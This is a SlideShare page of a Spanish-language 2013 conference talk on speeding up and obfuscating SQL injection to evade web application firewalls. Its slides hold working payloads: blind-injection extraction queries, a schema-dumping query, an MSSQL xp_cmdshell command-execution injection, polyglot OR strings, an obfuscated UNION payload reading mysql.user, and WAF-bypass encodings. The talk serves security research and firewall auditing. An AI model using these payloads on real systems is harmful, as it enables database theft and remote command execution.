SlideShare una empresa de Scribd logo

Nuevas técnicas de optimización y ofuscación [GuadalajaraCON 2013]

Descargar como PPTX, PDF
Websec México, S.C.
Websec México, S.C.

http://www.guadalajaracon.org/conferencias/nuevas-tecnicas-de-optimizacion-y-ofuscacion/ En esta plática se demostrarán las técnicas más nuevas y avanzadas de optimización y ofuscación disponibles en el campo de inyecciones de SQL. Estas técnicas sirven para evadir la detección de firewalls y sistemas de prevención de intrusos y extraer información de la base de datos a una velocidad impresionante. Se demostrarán estas técnicas siendo usadas en firewalls comerciales y open-source y también se presentará la versión ALPHA de Leapfrog. Leapfrog es una herramienta en desarrollo que tiene como funcionalidad ayudar a administradores de IT, expertos en firewalls, profesionales de seguridad y empresas a auditar las reglas de detección e implementación de su firewall y encontrar sus debilidades para poder entender si es una medida defensiva adecuada para detener un verdadero ataque. Muchas de las técnicas que se demostrarán fueron creadas por el presentador y actualmente son de los métodos más rápidos para extraer información de una base de datos a través de una inyección SQL. Se explicará cómo reducir el tiempo que tomar explotar una inyección de SQL por un tercio del tiempo que tomaría normalmente.

1 de 95
‘) UNION SELECT `Esta_Platica` AS (Nuevas Técnicas de Optimización y Ofuscación’)%00
Roberto Salgado • Co-fundador de Websec • Proporcionar soluciones de seguridad • Pen-testing, capacitación y monitoreo • Creador del base de conocimientos de SQLi • Pythonista / Investigador de seguridad Contacto • rsalgado@websec.mx • http://www.websec.mx • http://www.twitter.com/@LightOS
Indicé Optimización • Reducir el numero de peticiones • Reducir el tamaño de las peticiones Ofuscación • Retos de SQLi • Evadir Firewalls • Diversión con codificaciones Leapfrog • SQLi • LFI • XSS
Exploits de una mama Como prevenir Inyecciones de SQL? http://www.bobby-tables.com http://xkcd.com/327/
OPTIMIZACION
• Por que nos importa? OPTIMIZACION Intro http://xkcd.com/85/
Análisis de métodos • Bisección • Bitwise • Regex • Binario a posición (Bin2Pos) OPTIMIZACION Inyección de SQL a Ciegas
Recordatorio • Solo podemos obtener 1 carácter a la vez • Testeamos si tenemos el carácter correcto con respuestas “True” o “False” Ejemplo • SELECT * FROM users WHERE id=1 AND 1=1 • SELECT * FROM users WHERE id=1 AND 1=2 OPTIMIZACION Inyección de SQL a Ciegas
OPTIMIZACION Tabla ASCII
OPTIMIZACION Tabla ASCII Cada character ASCII puede ser representado con 1 byte o 8 bits Caracter a Binario (base 2) 01100001 Octal (base 8) 141 Decimal (base 10) 97 Hexadecimal (base 16) 61
El octavo bit del carácter ASCII que nos interesa siempre será 0 OPTIMIZACION Tabla ASCII Decimal Hexadecimal Binario 0 00 00000000 127 7F 01111111 255 FF 11111111 El rango ASCII que nos interesa Decimal Hexadecimal Binario 0 00 00000000 127 7F 01111111
• Algoritmo de búsqueda binaria • ASCII rango 32 – 126 • Se divide la mitad: (32 + 126) / 2 = 79 • El valor es mayor o menor? • Se divide la mitad nuevamente y se repite el proceso OPTIMIZACION Método Bisección
a = 97 decimal OPTIMIZACION Método Bisección 97 entre 79 y 126 True (32 + 126) / 2 = 79 97 entre 79 y 103 True (79 + 126) / 2 = 102.5 97 entre 79 y 91 False (79 + 103) / 2 = 91 97 entre 91 y 103 True (91 + 103) / 2 = 97 97 entre 91 y 97 True (91 + 97) / 2 = 95 97 entre 91 y 95 False (95 + 97) / 2 = 96 97 entre 95 y 97 True 97 != 96 97 == 97
• Cada carácter ASCII puede ser representado en 1 byte o 8 bits • El octavo bit del rango ASCII de los caracteres que nos interesa siempre es 0 • El numero de peticiones siempre será 7 OPTIMIZACION Métodos Bitwise
OPTIMIZACION Métodos Bitwise 01100001 >> 7 00000000 0 01100001 >> 6 00000001 1 01100001 >> 5 00000011 3 01100001 >> 4 00000110 6 01100001 >> 3 00001100 12 01100001 >> 2 00011000 24 01100001 >> 1 00110000 48 01100001 >> 0 01100001 97 "Faster Blind MySQL Injection Using Bit Shifting" - Por Jelmer de Hen
OPTIMIZACION Métodos Bitwise a = 97 dec = 01100001 (97 >> 7) = 0 1 o 0 1 (97 >> 6) = 0 1 o 0 0 (97 >> 5) = 2 010 o 011 0 (97 >> 4) = 6 0110 o 0111 1 "Faster Blind MySQL Injection Using Bit Shifting" - Por Jelmer de Hen
OPTIMIZACION Métodos Bitwise "Faster Blind MySQL Injection Using Bit Shifting" - Por Jelmer de Hen Pros: • La cantidad de peticiones es consistente Contras: • Siempre usa 7 peticiones • Implementacion rara • No soporta hilos
OPTIMIZACION Métodos Bitwise a = 97 dec = 01100001 substr(bin(97>>7),-1,1) 1 o 0 0 substr(bin(97>>6),-1,1) 1 o 0 1 substr(bin(97>>5),-1,1) 1 o 0 1 substr(bin(97>>4),-1,1) 1 o 0 0 "Faster Blind MySQL Injection Using Bit Shifting" – Mi variacion
OPTIMIZACION Métodos Bitwise "Faster Blind MySQL Injection Using Bit Shifting" – Mi variacion Pros: • La cantidad de peticiones es consistente • Hilos Contras: • Siempre usa 7 peticiones
OPTIMIZACION Métodos Bitwise a = 97 dec = 01100001 97 & 1 00000001 97 & 2 00000010 97 & 4 00000100 97 & 8 00001000 "Bit ANDing" - Por Ruben Ventura
OPTIMIZACION Métodos Bitwise a = 97 dec = 01100001 97 & 1 00000001 1 97 & 2 00000010 97 & 4 00000100 97 & 8 00001000 "Bit ANDing" - Por Ruben Ventura
OPTIMIZACION Métodos Bitwise a = 97 dec = 01100001 97 & 1 00000001 1 97 & 2 00000010 0 97 & 4 00000100 97 & 8 00001000 "Bit ANDing" - Por Ruben Ventura
OPTIMIZACION Métodos Bitwise a = 97 dec = 01100001 97 & 1 00000001 1 97 & 2 00000010 0 97 & 4 00000100 0 97 & 8 00001000 "Bit ANDing" - Por Ruben Ventura
OPTIMIZACION Métodos Bitwise a = 97 dec = 01100001 97 & 1 00000001 1 97 & 2 00000010 0 97 & 4 00000100 0 97 & 8 00001000 0 "Bit ANDing" - Por Ruben Ventura
"Bit ANDing" - Por Ruben Ventura OPTIMIZACION Métodos Bitwise Pros: • La cantidad de peticiones es consistente • Hilos Contras: • Siempre usa 7 peticiones
OPTIMIZACION Métodos Bitwise a = 97 dec = 01100001 substr(bin(97),1,1) 1100001 1 substr(bin(97),2,1) 1100001 1 substr(bin(97),3,1) 1100001 0 substr(bin(97),4,1) 1100001 0 "Bit Substringing" - Por Keith Makan
"Bit Substringing" - Por Keith Makan OPTIMIZACION Métodos Bitwise Pros: • La cantidad de peticiones es consistente • Hilos Contras: • Siempre usa 7 peticiones
‚Regex method‛ - Por Simone 'R00T_ATI' Quatrini y Marco 'white_sheep' Rondini OPTIMIZACION Método Regex REGEXP '^[a-z]' True REGEXP '^[a-n]' True REGEXP '^[a-g]' False REGEXP '^[h-n]' True REGEXP '^[h-l]' False
‚Regex method‛ - Por Simone 'R00T_ATI' Quatrini y Marco 'white_sheep' Rondini OPTIMIZACION Método Regex Pros: • No se tiene que convertir a decimal Contras: • Requiere comillas
• Requiere una lista de los caracteres posibles (32 – 126 decimal) • Entre mas cerca este el carácter al inicio de la lista, menos cantidad de peticiones son requeridas • Podemos ordenar la lista de caracteres por las letras mas frecuentes del idioma OPTIMIZACION Método Bin2Pos
• Relacionar el carácter con su posición en la lista • Convertir esta posición a binario • Hemos reducido la cantidad de caracteres a buscar a 2 (0 y 1) OPTIMIZACION Método Bin2Pos
• Nuestra lista (sin mayúsculas) – abcdefghijklmnopqrstuvwxyz _0123456789,.<>/?;:'"[{]}|=+- )(*&^%$#@!`~ • Lista hexadecimal – 0123456789ABCDEF • La lista mas grande tiene 94 caracteres – BIN(1) = 1 – BIN(94) = 1011110 OPTIMIZACION Método Bin2Pos
OPTIMIZACION Método Bin2Pos IF((@a:=MID(BIN(POSITION(MID((SE LECT password from users where id=2 LIMIT 1),1,1)IN CHAR(48,49,50,51,52,53,54,55,56, 57,65,66,67,68,69,70))),1,1))!=s pace(0),2-@a,0/0)
OPTIMIZACION Método Bin2Pos • a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s, t,u,v,w,x,y,z,0,1,2,3,4,5,6,7,8,9,_,!, @,#,$,%,^,&,*,(,),- ,+,=,,,.,",',~,`,,|,{,},[,],:,;, ,
OPTIMIZACION Método Bin2Pos • “C” es la 3era posición en la lista, que equivale a 11 en binario • El 11 tiene 6 ceros a su izquierda: 00000011 • Nuestra petición empieza con el primer 1 • Por lo mismo, el primer numero siempre será 1
OPTIMIZACION Método Bin2Pos Obteniendo 11 • Sabemos que el primer digito es 1 • No requiere petición • El segundo digito es 1? • Si • El tercer digito es 1? • No, el tercer digito no existe • Numero total de peticiones para “C”: 2
OPTIMIZACION Método Bin2Pos Pros: • Muy pocas peticiones • No es fácil de entender Contras: • Requieres 2 paginas diferentes • Entre mas grande la lista, mas peticiones son requeridas
OPTIMIZACION Comparación de Métodos
OPTIMIZACION Comparación de Métodos DEMO
OPTIMIZANDO CONSULTAS
Obtener todas las bases de datos, tablas y columnas con solo una petición OPTIMIZANDO CONSULTAS MySQL
SELECT (@) FROM (SELECT(@:=0x00),(SELECT (@) FROM (information_schema.columns) WHERE (table_schema>=@) AND (@)IN (@:=CONCAT(@,0x0a,' [ ',table_schema,' ] >',table_name,' > ',column_name))))x OPTIMIZANDO CONSULTAS MySQL
Demo OPTIMIZANDO CONSULTAS MySQL - Demo
Una consulta para ejecución de código remota • Checa si xp_cmdshell esta cargado • Si esta cargado, checa si esta activo • Corre el comando 'dir' y guarda el resultado en la tabla TMP_DB OPTIMIZANDO CONSULTAS MSSQL
' IF EXISTS (SELECT 1 FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME='TMP_DB') DROP TABLE TMP_DB DECLARE @a varchar(8000) IF EXISTS(SELECT * FROM dbo.sysobjects WHERE id = object_id (N'[dbo].[xp_cmdshell]') AND OBJECTPROPERTY (id, N'IsExtendedProc') = 1) BEGIN CREATE TABLE %23xp_cmdshell (name nvarchar(11), min int, max int, config_value int, run_value int) INSERT %23xp_cmdshell EXEC master..sp_configure 'xp_cmdshell' IF EXISTS (SELECT * FROM %23xp_cmdshell WHERE config_value=1)BEGIN CREATE TABLE %23Data (dir varchar(8000)) INSERT %23Data EXEC master..xp_cmdshell 'dir' SELECT @a='' SELECT @a=Replace(@a%2B'<br></font><font color="black">'%2Bdir,'<dir>','</font><font color="orange">') FROM %23Data WHERE dir>@a DROP TABLE %23Data END ELSE SELECT @a='xp_cmdshell not enabled' DROP TABLE %23xp_cmdshell END ELSE SELECT @a='xp_cmdshell not found' SELECT @a AS tbl INTO TMP_DB-- OPTIMIZANDO CONSULTAS MSSQL
• Las pruebas pueden llegar a ser tedioso • Inyecciones de SQL pueden usar comillas, comillas dobles o no tener comillas • 400+ parámetros por modulo?!?! OPTIMIZANDO CONSULTAS Mas Consultas de 1 Línea
Mínimo 3 pruebas diferentes por parámetro: • OR 1=1 • OR '1'='1 • OR “1”=“1 OPTIMIZANDO CONSULTAS Mas Consultas de 1 Línea
Que tal si los fusionamos? OPTIMIZANDO CONSULTAS Mas Consultas de 1 Línea - OR 1#"OR"'OR''='"="'OR''='
Que tal si los fusionamos? OPTIMIZANDO CONSULTAS Mas Consultas de 1 Línea - OR 1#"OR"'OR''='"="'OR''=' • Sin comillas
Que tal si los fusionamos? OPTIMIZANDO CONSULTAS Mas Consultas de 1 Línea - OR 1#"OR"'OR''='"="'OR''=' • Sin comillas • Doble comillas
Que tal si los fusionamos? OPTIMIZANDO CONSULTAS Mas Consultas de 1 Línea - OR 1#"OR"'OR''='"="'OR''=' • Sin comillas • Doble comillas • Comillas simples
Que tal AND? OPTIMIZANDO CONSULTAS Mas Consultas de 1 Línea - !=0--+"!="'!='
Que tal AND? OPTIMIZANDO CONSULTAS Mas Consultas de 1 Línea - !=0--+"!="'!=' • Sin comillas
Que tal AND? OPTIMIZANDO CONSULTAS Mas Consultas de 1 Línea - !=0--+"!="'!=' • Sin comillas • Doble comillas
Que tal AND? OPTIMIZANDO CONSULTAS Mas Consultas de 1 Línea - !=0--+"!="'!=' • Sin comillas • Doble comillas • Comillas simples
OFUSCACION
OFUSCACION Que es?
OFUSCACION Que es?
OFUSCACION Como Confundir al Admin UNION select@0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO $ fRom(SeLEct@0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO frOM`information_schema`.`triggers`)0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO WHere !FAlSE||tRue&&FalSe||FalsE&&TrUE like TruE||FalSE union/*!98765select@000OO0O0OooOoO0OOoooOOoOooo0o0o:=grOup_cONcaT(`username`)``from(users)whErE(username)like'a dmin'limit 1*/select@000OO0O0OooOoO0OOoooO0oOooo0o0o limit 1,0 UnION SeleCt(selEct(sELecT/*!67890sELect@000OO0O0O0oOoO0OOoooOOoOooo0o0o:=group_concat(`table_name`)FrOM information_schema.statistics WhERE TABLe_SCHEmA In(database())*//*!@000OO0O0OooOoO0OOoooO0oOooo0o0o:=gROup_conCat(/*!taBLe_naME)*/fRoM information_schema.partitions where TABLe_SCHEma not in(concat((select insert(insert((select (collation_name)from(information_schema.collations)where(id)=true+true),true,floor(pi()),trim(version()from(@@version))),floor(pi( )),ceil(pi()*pi()),space(0))), conv((125364/(true-!true))-42351, ceil(pi()*pi()),floor(pow(pi(),pi()))),mid(aes_decrypt(aes_encrypt(0x6175746F6D6174696F6E,0x4C696768744F53),0x4C696768744F5 3)FROM floor(version()) FOR ceil(version())),rpad(reverse(lpad(collation(user()),ceil(pi())--@@log_bin,0x00)),! !true,0x00),CHAR((ceil(pi())+!false)*ceil((pi()+ceil(pi()))*pi()),(ceil(pi()*pi())*ceil(pi()*pi()))--cos(pi()),(ceil(pi()*pi())*ceil(pi()*pi()))-- ceil(pi()),(ceil(pi()*pi())*ceil(pi()*pi()))-cos(pi()),(ceil(pi()*pi())*ceil(pi()*pi()))--floor(pi()*pi()),(ceil(pi()*pi())*ceil(pi()*pi()))- floor(pi()))),0x6d7973716c))from(select-- (select~0x7))0o0oOOO0Oo0OOooOooOoO00Oooo0o0oO)from(select@/*!/*!$*/from(select+3.``)000oOOO0Oo0OOooOooOoO00O ooo0o0oO)0o0oOOO0Oo0OOooOooOoO00Oooo0o0oO/*!76799sElect@000OO0O0OooOoO00Oooo0OoOooo0o0o:=group_concat( `user`)``from`mysql.user`WHeRe(user)=0x726f6f74*/#(SeLECT@ uNioN sElEcT AlL group_concat(cOLumN_nAME,1,1)FroM InFoRMaTioN_ScHemA.COLUMNS where taBle_scHema not in(0x696e666f726d6174696f6e5f736368656d61,0x6d7973716c)UNION SELECT@0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO UNION SELECT@0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO UNION SELECT@000OO0O0OooOoO0OOoooO0oOooo0o0oOO UNION SELECT@0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO)
EVADIENDO FIREWALLS
EVADIENDO FIREWALLS Tips Generales • Simple casi siempre es mejor • Lea la documentación para el comportamiento inesperado y rarezas • Aprende de que es capaz el sistema de base de datos y lo que puede manejar
OFUSCACION Fuzzer Sencillo en PHP <?php $link = mysql_connect('localhost', 'root', ''); for($i=0; $i<=255; $i++) { $query = mysql_query("SELECT 1 FROM dual WHERE 1" . chr($i) . "=1"); if(!$query) { continue; } echo $i . ':0x' . dechex($i) . ':' . chr($i) . '<br>'; } ?>
OFUSCACION Fuzzer Sencillo en PHP
OFUSCACION Espacios Validos SQLite3 - 0A, 0D, 0C, 09, 20 MySQL - 09, 0A, 0B, 0C, 0D, A0, 20 MSSQL - 01, 02, 03, 04, 05, 06, 07, 08, 09, 0A, 0B, 0C, 0D, 0E, 0F, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 1A, 1B, 1C, 1D, 1E, 1F, 20, 25
EVADIENDO FIREWALLS Tips Generales • No empieces con algo complicado y obvio • Mejor mantenlo simple – CASE WHEN TRUE THEN TRUE END - UNION SELECT GROUP_CONCAT(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES
EVADIENDO FIREWALLS Tips Generales • No empieces con algo complicado y obvio • Mejor mantenlo simple – CASE WHEN TRUE THEN TRUE ELSE 1 END - UNION SELECT GROUP_CONCAT(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES
EVADIENDO FIREWALLS Tips Generales • No empieces con algo complicado y obvio • Mejor mantenlo simple – CASE WHEN (SELECT TRUE) THEN TRUE ELSE 1 END - UNION SELECT GROUP_CONCAT(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES
EVADIENDO FIREWALLS Tips Generales • No empieces con algo complicado y obvio • Mejor mantenlo simple – CASE WHEN (SELECT TRUE FROM dual) THEN TRUE ELSE 1 END - UNION SELECT GROUP_CONCAT(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES
EVADIENDO FIREWALLS Tips Generales • No empieces con algo complicado y obvio • Mejor mantenlo simple – CASE WHEN (SELECT TRUE FROM dual) THEN TRUE ELSE 1 END - UNION SELECT GROUP_CONCAT(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES
EVADIENDO FIREWALLS Tips Generales • No empieces con algo complicado y obvio • Mejor mantenlo simple – CASE WHEN (SELECT TRUE FROM`dual`) THEN TRUE ELSE 1 END - UNION SELECT GROUP_CONCAT(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES
EVADIENDO FIREWALLS Tips Generales • No empieces con algo complicado y obvio • Mejor mantenlo simple – CASE WHEN (SELECT(TRUE)FROM`dual`) THEN TRUE ELSE 1 END - UNION SELECT GROUP_CONCAT(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES
EVADIENDO FIREWALLS Retos de SQLi Modsecurity http://www.modsecurity.org/testphp.vulnweb.c om/artists.php?artist=- 2%20div%201%20union%20all%23in%0A%23bet ween%20comments%0A23in%0A%23between% 20comments%0A%0Aselect%200x00,%200x41% 20like/*!31337table_name*/,3%20from%20inf ormation_schema.tables%20limit%201
EVADIENDO FIREWALLS Codificaciones • URL encode • Double URL encode • Unicode encode • Short UTF8 • Long UTF8 • First Nibble • Second Nibble • Double Nibble • Invalid Hex
EVADIENDO FIREWALLS – Codificaciones URL Encode • URL Encoding se usa para transformar caracteres “especiales” para que se puedan mandar por HTTP • Los caracteres son transformados en su equivalente hexadecimal, con el % (signo de porcentaje) de prefijo • a = %61
EVADIENDO FIREWALLS – Codificaciones Double URL Encode • Double URL encode es el proceso de re- codificar el % (signo de porcentaje) • a = %61 • %61 = %2561
EVADIENDO FIREWALLS – Codificaciones URL Encode / Firewalls Debiles Descripcion del tamper script “charencode” de SQLMAP que se usa para codificar la peticion como URL encode: “Useful to bypass very weak web application firewalls that do not url-decode the request before processing it through their ruleset”
EVADIENDO FIREWALLS – Codificaciones URL Encode / Firewalls Debiles Demo
EVADIENDO FIREWALLS – Codificaciones Nibble • Un nibble son 4 bits • Un nibble representa medio caracter hexadecimal (2^4 = 16) • Dos nibbles o un octet, representa un caracter hexadecimal
EVADIENDO FIREWALLS – Codificaciones Nibble Hex Decimal Octal Binary 0 0 0 0000 1 1 1 0001 2 2 2 0010 3 3 3 0011 4 4 4 0100 5 5 5 0101 6 6 6 0110 7 7 7 0111 8 8 10 1000 9 9 11 1001 A 10 12 1010 B 11 13 1011 C 12 14 1100 D 13 15 1101 E 14 16 1110 F 15 17 1111
EVADIENDO FIREWALLS – Codificaciones First Nibble • Los primeros 4 bits son URL encoded • “a” = %61 • 6 = %36 • %%361
EVADIENDO FIREWALLS – Codificaciones Second Nibble • Los segundos 4 bits son URL encoded • “a” = %61 • 1 = %31 • %6%31
EVADIENDO FIREWALLS – Codificaciones Double Nibble • Es una combinacion de “first nibble” + “second nibble” encoding • “a” = %61 • 6 = 36 • 1 = %31 • %%36%31
EVADIENDO FIREWALLS – Codificaciones Hex Invalido • Se trata de crear hex invalido que resulta en el mismo valor decimal que hex valido • “a” = %61 • %61 = 6 * 16 + 1 = 97 • %2Ú = 2 * 16 + 65 = 97 • %2Ú es lo mismo que %61
EVADIENDO FIREWALLS – Codificaciones Invalid Hex Decimal Hex Valido Hex Invalido 10 0A 0A 11 0B 0B 12 0C 0C 13 0D 0D 14 0E 0E 15 0F 0F 16 10 0G 17 11 0H
RAREZAS DE PHP
RAREZAS DE PHP Espacios <?php if(preg_match("/^.+$/", $_GET["t"])) { Bloque peticion maliciosa... } ?> ?t=1 AND 1=1 BLOQUEADO ?t=1 AND 1=1%20 ?t=1 AND 1=1%A0 ?t=1 AND 1=1%0D,%0C,%0B ?t=1 AND 1=1%0A%20 BLOQUEADO BLOQUEADO BLOQUEADO PERMITIDO
RAREZAS DE PHP Espacios <?php if(preg_match("/s+/", $_GET["t"])) { Bloque peticion maliciosa... } ?> • En algunas configuraciones el NBSP es detectado como un espacio, en otras configuraciones no lo es
LEAPFROG
• Una herramienta diseñada para mejorar las reglas del Firewall • Busca bypases para diferentes ataques web (SQLi, XSS, LFI, Filtros de contenido) • Crea todo sus vectores dinámicamente • Proporciona recomendaciones al encontrar un bypass • Genera una calificación basada en la cantidad de vectores permitidos LEAPFROG Que es?
• WAF Acceptance Factor es la calificación que genera basado en los vectores permitidos LEAPFROG WAF Acceptance Factor
• Wife Acceptance Factor tomado de: http://en.wikipedia.org/wiki/Wife_acceptance_factor LEAPFROG Wife Acceptance Factor
EL FIN
@LightOS rsalgado@websec.mx http://www.websec.mx El FIN Informacion de Contacto
www.WEBSEC.mx

Recomendados

Nuevas tecnicas de optimización y ofuscacion
Nuevas tecnicas de optimización y ofuscacionNuevas tecnicas de optimización y ofuscacion
Nuevas tecnicas de optimización y ofuscacionTensor
 
Nuevas tecnicas de optimización y ofuscacion
Nuevas tecnicas de optimización y ofuscacionNuevas tecnicas de optimización y ofuscacion
Nuevas tecnicas de optimización y ofuscacionTensor
 
Programación MySQL-Ejercicios
Programación MySQL-EjerciciosProgramación MySQL-Ejercicios
Programación MySQL-Ejerciciostestgrupocomex
 
Presentacio sql ok
Presentacio sql okPresentacio sql ok
Presentacio sql okBB
 
CPMX7 Pwneando redes informáticas por Paulino Calderon
CPMX7 Pwneando redes informáticas por Paulino CalderonCPMX7 Pwneando redes informáticas por Paulino Calderon
CPMX7 Pwneando redes informáticas por Paulino CalderonWebsec México, S.C.
 
Dragonjarcon2015 - ¿Cómo programar aplicaciones seguras? por Paulino Calderon...
Dragonjarcon2015 - ¿Cómo programar aplicaciones seguras? por Paulino Calderon...Dragonjarcon2015 - ¿Cómo programar aplicaciones seguras? por Paulino Calderon...
Dragonjarcon2015 - ¿Cómo programar aplicaciones seguras? por Paulino Calderon...Websec México, S.C.
 
Pentesting 101 por Paulino Calderon
Pentesting 101 por Paulino CalderonPentesting 101 por Paulino Calderon
Pentesting 101 por Paulino CalderonWebsec México, S.C.
 
El porqué está fallando tu programa de seguridad informática por Paulino Cald...
El porqué está fallando tu programa de seguridad informática por Paulino Cald...El porqué está fallando tu programa de seguridad informática por Paulino Cald...
El porqué está fallando tu programa de seguridad informática por Paulino Cald...Websec México, S.C.
 

Recomendados

Nuevas tecnicas de optimización y ofuscacion
Nuevas tecnicas de optimización y ofuscacionNuevas tecnicas de optimización y ofuscacion
Nuevas tecnicas de optimización y ofuscacionTensor
 
Nuevas tecnicas de optimización y ofuscacion
Nuevas tecnicas de optimización y ofuscacionNuevas tecnicas de optimización y ofuscacion
Nuevas tecnicas de optimización y ofuscacionTensor
 
Programación MySQL-Ejercicios
Programación MySQL-EjerciciosProgramación MySQL-Ejercicios
Programación MySQL-Ejerciciostestgrupocomex
 
Presentacio sql ok
Presentacio sql okPresentacio sql ok
Presentacio sql okBB
 
CPMX7 Pwneando redes informáticas por Paulino Calderon
CPMX7 Pwneando redes informáticas por Paulino CalderonCPMX7 Pwneando redes informáticas por Paulino Calderon
CPMX7 Pwneando redes informáticas por Paulino CalderonWebsec México, S.C.
 
Dragonjarcon2015 - ¿Cómo programar aplicaciones seguras? por Paulino Calderon...
Dragonjarcon2015 - ¿Cómo programar aplicaciones seguras? por Paulino Calderon...Dragonjarcon2015 - ¿Cómo programar aplicaciones seguras? por Paulino Calderon...
Dragonjarcon2015 - ¿Cómo programar aplicaciones seguras? por Paulino Calderon...Websec México, S.C.
 
Pentesting 101 por Paulino Calderon
Pentesting 101 por Paulino CalderonPentesting 101 por Paulino Calderon
Pentesting 101 por Paulino CalderonWebsec México, S.C.
 
El porqué está fallando tu programa de seguridad informática por Paulino Cald...
El porqué está fallando tu programa de seguridad informática por Paulino Cald...El porqué está fallando tu programa de seguridad informática por Paulino Cald...
El porqué está fallando tu programa de seguridad informática por Paulino Cald...Websec México, S.C.
 
Escribiendo firmas para el sistema de detección de versiones de Nmap
Escribiendo firmas para el sistema de detección de versiones de NmapEscribiendo firmas para el sistema de detección de versiones de Nmap
Escribiendo firmas para el sistema de detección de versiones de NmapWebsec México, S.C.
 
Que es y como usar nmap
Que es y como usar nmapQue es y como usar nmap
Que es y como usar nmapLuis Pinilla
 
Taller: Exploración de redes con Nmap
Taller: Exploración de redes con NmapTaller: Exploración de redes con Nmap
Taller: Exploración de redes con NmapWebsec México, S.C.
 
Nmap not only a port scanner by ravi rajput comexpo security awareness meet
Nmap not only a port scanner by ravi rajput comexpo security awareness meet Nmap not only a port scanner by ravi rajput comexpo security awareness meet
Nmap not only a port scanner by ravi rajput comexpo security awareness meet Ravi Rajput
 
Scanning with nmap
Scanning with nmapScanning with nmap
Scanning with nmapcommiebstrd
 
Nmap
NmapNmap
NmapFat-Thing Gabriel-Culley
 
N map presentation
N map presentationN map presentation
N map presentationulirraptor
 
Hacking With Nmap - Scanning Techniques
Hacking With Nmap - Scanning TechniquesHacking With Nmap - Scanning Techniques
Hacking With Nmap - Scanning Techniquesamiable_indian
 
Desarrollando para Nmap Scripting Engine (NSE) [GuadalajaraCON 2013]
Desarrollando para Nmap Scripting Engine (NSE) [GuadalajaraCON 2013]Desarrollando para Nmap Scripting Engine (NSE) [GuadalajaraCON 2013]
Desarrollando para Nmap Scripting Engine (NSE) [GuadalajaraCON 2013]Websec México, S.C.
 
Nuevas tecnicas de optimización y ofuscacion
Nuevas tecnicas de optimización y ofuscacionNuevas tecnicas de optimización y ofuscacion
Nuevas tecnicas de optimización y ofuscacionTensor
 
Mysql
MysqlMysql
MysqlLearn Pure Insanity
 
Tuning fondo-negro-2
Tuning fondo-negro-2Tuning fondo-negro-2
Tuning fondo-negro-2Felipe Ciau Cante
 
(In) seguridad web
(In) seguridad web(In) seguridad web
(In) seguridad webEventos Creativos
 
Sesión 4
Sesión 4Sesión 4
Sesión 4Michael Andrés Calderón Ferreira
 
Tecnicas de Blind-Mysql-Injection
Tecnicas de Blind-Mysql-InjectionTecnicas de Blind-Mysql-Injection
Tecnicas de Blind-Mysql-Injectionq3rv0
 
7090112 Clase Transact Sql Server
7090112 Clase Transact Sql Server7090112 Clase Transact Sql Server
7090112 Clase Transact Sql ServerCorfapo
 
Presentacionsubnet
PresentacionsubnetPresentacionsubnet
PresentacionsubnetRonald Geovanny Alburquerque
 
3. algoritmos de ordenamiento interno
3. algoritmos de ordenamiento interno3. algoritmos de ordenamiento interno
3. algoritmos de ordenamiento internoFernando Solis
 
Sentencias
SentenciasSentencias
SentenciasJohannaLopez102476
 
Mejores prácticas desarrollo de base de datos
Mejores prácticas desarrollo de base de datos Mejores prácticas desarrollo de base de datos
Mejores prácticas desarrollo de base de datos Eduardo Castro
 
Mysql
MysqlMysql
MysqlManuel Velesaca
 
MANUAL
MANUALMANUAL
MANUALEMRA197344
 

Más contenido relacionado

Destacado

Escribiendo firmas para el sistema de detección de versiones de Nmap
Escribiendo firmas para el sistema de detección de versiones de NmapEscribiendo firmas para el sistema de detección de versiones de Nmap
Escribiendo firmas para el sistema de detección de versiones de NmapWebsec México, S.C.
 
Que es y como usar nmap
Que es y como usar nmapQue es y como usar nmap
Que es y como usar nmapLuis Pinilla
 
Taller: Exploración de redes con Nmap
Taller: Exploración de redes con NmapTaller: Exploración de redes con Nmap
Taller: Exploración de redes con NmapWebsec México, S.C.
 
Nmap not only a port scanner by ravi rajput comexpo security awareness meet
Nmap not only a port scanner by ravi rajput comexpo security awareness meet Nmap not only a port scanner by ravi rajput comexpo security awareness meet
Nmap not only a port scanner by ravi rajput comexpo security awareness meet Ravi Rajput
 
Scanning with nmap
Scanning with nmapScanning with nmap
Scanning with nmapcommiebstrd
 
N map presentation
N map presentationN map presentation
N map presentationulirraptor
 
Hacking With Nmap - Scanning Techniques
Hacking With Nmap - Scanning TechniquesHacking With Nmap - Scanning Techniques
Hacking With Nmap - Scanning Techniquesamiable_indian
 
Desarrollando para Nmap Scripting Engine (NSE) [GuadalajaraCON 2013]
Desarrollando para Nmap Scripting Engine (NSE) [GuadalajaraCON 2013]Desarrollando para Nmap Scripting Engine (NSE) [GuadalajaraCON 2013]
Desarrollando para Nmap Scripting Engine (NSE) [GuadalajaraCON 2013]Websec México, S.C.
 

Destacado (9)

Escribiendo firmas para el sistema de detección de versiones de Nmap
Escribiendo firmas para el sistema de detección de versiones de NmapEscribiendo firmas para el sistema de detección de versiones de Nmap
Escribiendo firmas para el sistema de detección de versiones de Nmap
 
Que es y como usar nmap
Que es y como usar nmapQue es y como usar nmap
Que es y como usar nmap
 
Taller: Exploración de redes con Nmap
Taller: Exploración de redes con NmapTaller: Exploración de redes con Nmap
Taller: Exploración de redes con Nmap
 
Nmap not only a port scanner by ravi rajput comexpo security awareness meet
Nmap not only a port scanner by ravi rajput comexpo security awareness meet Nmap not only a port scanner by ravi rajput comexpo security awareness meet
Nmap not only a port scanner by ravi rajput comexpo security awareness meet
 
Scanning with nmap
Scanning with nmapScanning with nmap
Scanning with nmap
 
Nmap
NmapNmap
Nmap
 
N map presentation
N map presentationN map presentation
N map presentation
 
Hacking With Nmap - Scanning Techniques
